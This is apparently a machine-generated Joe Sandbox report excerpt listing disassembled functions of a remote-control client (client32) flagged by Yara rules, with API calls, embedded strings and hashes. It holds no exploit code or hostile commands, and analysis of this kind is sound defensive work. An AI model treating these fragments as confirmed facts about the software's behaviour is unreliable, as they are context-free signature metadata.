                                                                                                • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                                • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 69D06D0A
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __getptd.LIBCMT ref: 69D06D21
                                                                                                • __amsg_exit.LIBCMT ref: 69D06D2F
                                                                                                • __lock.LIBCMT ref: 69D06D3F
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 69D06D53
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: d01c1a0d499d0c4417f3703d9408c392d52ccd232d849257e87f0c2911aba619
                                                                                                • Instruction ID: 46d77a3f85c72f1142d1906318cee75589c573cbabe8e6ebaaed479379baf8d6
                                                                                                • Opcode Fuzzy Hash: d01c1a0d499d0c4417f3703d9408c392d52ccd232d849257e87f0c2911aba619
                                                                                                • Instruction Fuzzy Hash: 23F09036904710DAEA11EF68442178E37A0BF00B28F90D73DFA54A7EC0CB249980DA79
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 11171312
                                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                • __getptd.LIBCMT ref: 11171329
                                                                                                • __amsg_exit.LIBCMT ref: 11171337
                                                                                                • __lock.LIBCMT ref: 11171347
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                                • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E,00000000,00000000,?,110CCCA0,00000000,110314FA,00000104), ref: 1114542A
                                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                                  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                                  • Part of subcall function 110CC360: MapWindowPoints.USER32 ref: 110CC39C
                                                                                                  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                                  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                                • std::exception::exception.LIBCMT ref: 11053483
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 2181554437-3415836059
                                                                                                • Opcode ID: a6b0480843f53e02530e0c60f3bcb335d2d4984fd15d6a9e6fe082baa2b0fdfd
                                                                                                • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                                • Opcode Fuzzy Hash: a6b0480843f53e02530e0c60f3bcb335d2d4984fd15d6a9e6fe082baa2b0fdfd
                                                                                                • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 110670A8
                                                                                                • GetTickCount.KERNEL32(General,TicklePeriod,00000012,00000000), ref: 110671F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick
                                                                                                • String ID: General$TicklePeriod
                                                                                                • API String ID: 536389180-1546705386
                                                                                                • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                                • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CF0D9C
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF0DB1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: DATA$NAME
                                                                                                • API String ID: 1338273076-4000142801
                                                                                                • Opcode ID: 23829fd0a33833938399c33cf73ee38230833c174df6067d0bce1f53c7f66f76
                                                                                                • Instruction ID: 8f3d3847cdc7c5671966e2a18fe43574b718698dd3a48d6d9a9aebccd3ce3e1f
                                                                                                • Opcode Fuzzy Hash: 23829fd0a33833938399c33cf73ee38230833c174df6067d0bce1f53c7f66f76
                                                                                                • Instruction Fuzzy Hash: 8D41F7B5C002499FDF54DFE4D880AEEBBB4FF08614F50853EE926A7640E7345A06CB91
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF619F
                                                                                                  • Part of subcall function 69CF33A0: wsprintfA.USER32 ref: 69CF34FD
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                • String ID: CMD=CONTROL_SEND_PIN$PIN=%s$PINserver
                                                                                                • API String ID: 2968883096-3759296614
                                                                                                • Opcode ID: f4f86adb840a4f2aad9963c1ea392d88c73b72205403e47304781aa05f23c799
                                                                                                • Instruction ID: 61d15e9d1e25253233c44e348ef9370dad700e4c93fd98994b35e5cb152731db
                                                                                                • Opcode Fuzzy Hash: f4f86adb840a4f2aad9963c1ea392d88c73b72205403e47304781aa05f23c799
                                                                                                • Instruction Fuzzy Hash: 29314576D10118AADB64DB74DC41FDEB7B8AB44314F40C2D9E60DE7181EE305A898B60
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D0A
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                • API String ID: 190572456-1434219782
                                                                                                • Opcode ID: 20cb8756c2b06c9c184e035f1a9f9102ef14d4e2ff3d99559f685ad3814e9384
                                                                                                • Instruction ID: 9b4de76f96d6d7a3585f3ed10674baba21c29ce5338254265ea712b7813a8280
                                                                                                • Opcode Fuzzy Hash: 20cb8756c2b06c9c184e035f1a9f9102ef14d4e2ff3d99559f685ad3814e9384
                                                                                                • Instruction Fuzzy Hash: 783119769001A59FEB21DF68CDD0B99B7F4FF49345B5089B9E689D7200D270AAC4CF10
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 110D1378
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                • API String ID: 1528188558-323366856
                                                                                                • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                                • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                                APIs
                                                                                                • #16.WSOCK32(?,?,?,00000000), ref: 69CF79F1
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 69CF7A16
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: hbuf->data$httputil.c
                                                                                                • API String ID: 1452528299-2732665889
                                                                                                • Opcode ID: 7ea4eae048862b99ba0e0310b89b2f5b793246d426b8f3d833c217033de6c8c5
                                                                                                • Instruction ID: 30ca919537b135777b6ac7a572dd94c0dd8b9ddd78e0c733ccca8c8450351950
                                                                                                • Opcode Fuzzy Hash: 7ea4eae048862b99ba0e0310b89b2f5b793246d426b8f3d833c217033de6c8c5
                                                                                                • Instruction Fuzzy Hash: B521607A600B019FD320CF29ED80E57B3E5EF94228B15D82DE99E87A01E731F9029B50
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D0A
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                • API String ID: 190572456-1434219782
                                                                                                • Opcode ID: e4ffb8695d782c0bec3f062dfe066bf8f51141b3342c0815e2556f6c25a64bfa
                                                                                                • Instruction ID: 0e31b2ac09b130463da8c4143c6dbe3503251a8c344e69781b0cb53a97858a96
                                                                                                • Opcode Fuzzy Hash: e4ffb8695d782c0bec3f062dfe066bf8f51141b3342c0815e2556f6c25a64bfa
                                                                                                • Instruction Fuzzy Hash: 71212A75D101A99FEB21DF54DA90BE8B3B4BB48345F5089B9EA89D7200E6709EC4CF50
                                                                                                APIs
                                                                                                • __wcstoui64.LIBCMT ref: 69CE6107
                                                                                                  • Part of subcall function 69D049AE: strtoxl.LIBCMT ref: 69D049D0
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,?,?,?,?,?,?,?,?,-000397EB), ref: 69CE6129
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,-000397EB,?,?,69CF3361), ref: 69CE6168
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
                                                                                                • String ID: CONNECTION_ID
                                                                                                • API String ID: 2450600163-332495620
                                                                                                • Opcode ID: 632f153b490887ca242e43b8e403024c962ed443d75c854ffc6a80f614eeb41a
                                                                                                • Instruction ID: 4143078d7be17fa33755319abb0501ae7db428503cbe2710e3f7cda39ecaa57d
                                                                                                • Opcode Fuzzy Hash: 632f153b490887ca242e43b8e403024c962ed443d75c854ffc6a80f614eeb41a
                                                                                                • Instruction Fuzzy Hash: 4E11DC7A914A802BFF128B54BF4174F3624AF02388F05A035EB4743743F7B5AA4582A3
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 69CE6C0F
                                                                                                • SetLastError.KERNEL32(00000078), ref: 69CE6C2E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: *$InternetQueryOptionA
                                                                                                • API String ID: 199729137-4161725205
                                                                                                • Opcode ID: 04d1dcf70ac8b533b701b7184af08221245ae24192be3ae6f31437dffa156ed7
                                                                                                • Instruction ID: 575edadc67177cac8f735e20d0ecf5d9ce19d5494c5249d343ced67233f71c2d
                                                                                                • Opcode Fuzzy Hash: 04d1dcf70ac8b533b701b7184af08221245ae24192be3ae6f31437dffa156ed7
                                                                                                • Instruction Fuzzy Hash: 17219F71900648DFDF10DF68D950B9DBBF0FF49310F10816AEA16AB280E775AA41CF91
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,986DAFD2), ref: 1105D59E
                                                                                                • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,986DAFD2), ref: 1105D5A8
                                                                                                Strings
                                                                                                • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                                • API String ID: 3094578987-11999416
                                                                                                • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                                • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                                • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                                • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 111535AC
                                                                                                • _memmove.LIBCMT ref: 111535E6
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                • API String ID: 6605023-1396654219
                                                                                                • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                                • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memsetwsprintf
                                                                                                • String ID: %s_%d$Gateway_Name
                                                                                                • API String ID: 1984265443-207007254
                                                                                                • Opcode ID: a2cd85628cd3cb6bef5c292b48f5c4375e722184f460a1e4a4f61bf6bb8ce40e
                                                                                                • Instruction ID: 85c27c27634c148cedb9946aaec8eb9b195fccdc36bcd689bcf38f68b83f4113
                                                                                                • Opcode Fuzzy Hash: a2cd85628cd3cb6bef5c292b48f5c4375e722184f460a1e4a4f61bf6bb8ce40e
                                                                                                • Instruction Fuzzy Hash: D60147B8900208AFEB00DB68DC51FBE7378EF46308F408064FE0687280E630AE04C7A5
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1136984157-1986719024
                                                                                                • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                                • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEC36A
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: FLG=%d$ID=%d$UID=%s
                                                                                                • API String ID: 3180605519-3107437138
                                                                                                • Opcode ID: 6b67d65332af269091184d3ae68a054ce1de86bab88245185f7a9a7518ff12c2
                                                                                                • Instruction ID: 25907ebe326500f4a8a94afb19104730371ceaabde1177a476da86027b8fa0bf
                                                                                                • Opcode Fuzzy Hash: 6b67d65332af269091184d3ae68a054ce1de86bab88245185f7a9a7518ff12c2
                                                                                                • Instruction Fuzzy Hash: B1F062BA5002047BEB029B26EC84FABB75CEF06128F40D111FD1997A45E735E525C7F4
                                                                                                APIs
                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                • API String ID: 819365019-2727927828
                                                                                                • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                APIs
                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                • _free.LIBCMT ref: 1103D221
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                                • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                                Strings
                                                                                                • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                                • String ID: Show has overrun too much, aborting
                                                                                                • API String ID: 304545663-4092325870
                                                                                                • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
